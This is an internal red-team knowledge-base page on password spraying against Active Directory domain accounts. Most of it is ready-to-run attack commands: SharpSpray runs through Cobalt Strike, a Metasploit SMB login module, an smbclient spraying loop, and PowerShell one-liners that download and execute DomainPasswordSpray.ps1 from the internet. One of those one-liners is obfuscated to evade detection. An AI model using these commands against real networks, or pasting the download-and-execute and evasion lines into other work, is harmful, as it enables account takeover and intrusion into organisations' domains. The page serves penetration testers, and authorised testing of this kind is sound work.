Antisyphon KB

Internal password spraying - Domain users

Nov 04, 20242 min read

Password Spraying - Domain Users

USE “Spray-AD” in Cobalt Strike to do Kerberos password spraying!!

.NET: SharpSpray

--Sleep 60 = Sleep 60 minutes between each round of log in attempts.

  1. Start with custom password seeds:
execute-assembly /pipe/ANY/4.5/SharpSpray.exe --Sleep 60 --Seeds Password,Welcome,<CompanyName>
  1. Spray with the built-in, generated passwords:
execute-assembly /pipe/ANY/4.5/SharpSpray.exe --Sleep 60
  1. Spray with a list of comma-separated passwords:
execute-assembly /pipe/ANY/4.5/SharpSpray.exe --Passwords Acme123!,Acme123 --Sleep 60

Consider using Kerbrute - stealthier (noted 2021-05-25) https://github.com/ropnop/kerbrute

Metasploit

use auxiliary/scanner/smb/smb_login
set USER_FILE <PATH TO USERNAMES LIST>
set SMBPass <PASSWORD>
set SMBDomain <DOMAIN NAME>
set RHOSTS <DOMAIN CONTROLLER IP>
set verbose true
run

Invoke-DomainPasswordSpray

Raw source:

https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1

Basic download and exec one-liner:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1')

Obfuscated download and exec one-liner (2020-06):

  • Replaces Invoke-DomainPasswordSpray with Invoke-DPS
iex ((((( new-object net.webclient).downloadstring('https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1') -replace "#Requires -version 2","") -replace "(?ms)<#.*?#>","") -replace "`n\s*#.*","`n" ) -replace 'Invoke-DomainPasswordSpray','Invoke-DPS' )

Standard usage: # (These two commands can’t be run as a single command. I tried :/)

Start-Transcript 07-02.pass-spray2.script

Invoke-DomainPasswordSpray -Outfile password-spray.txt -UsernameAsPassword

Invoke-DomainPasswordSpray -Outfile password-spray.txt -Password "<** TEST MY USER PASSWORD!! **>" -Force

Start-Sleep 3000 ; Invoke-DomainPasswordSpray -Outfile password-spray.txt -PasswordList .\passwords.txt -Delay 32 -Force

smbclient

Password1:

for u in $(cat usernames.CONFIRMED.txt) ; do echo -e "===\nTrying $u..." ; smbclient -U 'YOURDOMAIN\'$u'%Password1' //192.168.1.1/SYSVOL 2>&1 ; done | tee password-spray.txt

grep -vE '^===$|^Trying|FAILURE' password-spray.txt

Graph View

Backlinks